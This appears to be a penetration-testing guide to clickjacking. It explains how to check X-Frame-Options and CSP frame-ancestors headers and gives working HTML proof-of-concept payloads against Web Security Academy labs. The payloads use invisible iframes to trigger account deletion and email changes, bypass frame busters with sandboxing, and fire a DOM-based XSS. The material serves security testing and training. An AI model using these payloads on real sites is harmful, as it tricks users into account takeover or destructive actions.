Clickjacking
Clickjacking is an attack that tricks users into clicking on something different from what they perceive, usually by overlaying invisible iframes.
Methodology
Black Box Testing
Visit all pages of the application and note the response headers.
Look for the following headers:
X-Frame-OptionsContent-Security-Policy
Evaluate the headers:
If
X-Frame-Optionsis set toDENYorSAMEORIGIN, the application is likely not vulnerable to clickjacking.If the
Content-Security-Policyheader includes theframe-ancestorsdirective and it is set to'none'or'self', the application is also likely protected.
If the
frame-ancestorsdirective contains a domain (e.g.,*.trusted.com), review it for:Wildcard configurations
Misconfigurations or overly permissive policies
Test any identified instances where framing is allowed to verify clickjacking vulnerabilities.
White Box Testing
Identify the framework used by the application.
Identify existing defenses related to clickjacking.
Identify any libraries used to configure security headers.
Review the header configurations and ensure they are set securely.
Test the identified instances of clickjacking and develop proof-of-concept exploits where applicable.
POC - Basic clickjacking with CSRF token protection
<style>
iframe {
position:relative;
width:1000px;
height:1000px;
opacity:1;
z-index:2;
}
div {
position:absolute;
width:300px;
height:400px;
z-index:1;
}
</style>
<div>click</div>
<iframe src="https://0a21002e04091c0a81cf6be700310017.web-security-academy.net/my-account/delete"></iframe>POC - Clickjacking with form input data prefilled from a URL paramete
<style>
iframe {
position:relative;
width:1000px;
height:800px;
opacity:0.00000001;
z-index:2;
}
div {
position:absolute;
top:455px;
left:80px;
z-index:1;
}
</style>
<div>Click me</div>
<iframe src="https://0a4800c9043cfe8887aab0b8007e0009.web-security-academy.net/my-account?email=pwned@admin-user.net"></iframe>POC - Bypass frame breaking scripts protections
A common client-side protection enacted through the web browser is to use frame busting or frame breaking scripts. An effective attacker workaround against frame busters is to use the HTML5 iframe sandbox attribute. Both the allow-forms and allow-scripts values permit the specified actions within the iframe but top-level navigation is disabled. This inhibits frame busting behaviors while allowing functionality within the targeted site.
If see This page cannot be framed use sandbox="allow-forms to bypass it
<style>
iframe {
position:relative;
width:1000px;
height:800px;
opacity:0.50;
z-index:2;
}
div {
position:absolute;
top:455px;
left:80px;
z-index:1;
}
</style>
<div>Click me</div>
<iframe sandbox="allow-forms" src="https://0a4a00ea0359905080cd71c100c100b7.web-security-academy.net/my-account?email=pwned@compromised-user.com"></iframe>POC -Exploiting clickjacking vulnerability to trigger DOM-based XSS
<style>
iframe {
position:relative;
width:1000px;
height:1000px;
opacity:0.0000001;
z-index:2;
}
div {
position:absolute;
top:800px;
left:76px;
z-index:1;
}
</style>
<div>Click me</div>
<iframe src="https://0ae300dd03b6f211807821f600b8007a.web-security-academy.net/feedback?name=%3Cimg%20src=x%20onerror=print()%3E&email=test@test.com&subject=test&message=test"></iframe>POC - Multistep clickjacking
<style>
iframe {
position:relative;
width:$width_value;
height: $height_value;
opacity: $opacity;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:$top_value1;
left:$side_value1;
z-index: 1;
}
.secondClick {
top:$top_value2;
left:$side_value2;
}
</style>
<div class="firstClick">Test me first</div>
<div class="secondClick">Test me next</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>Last updated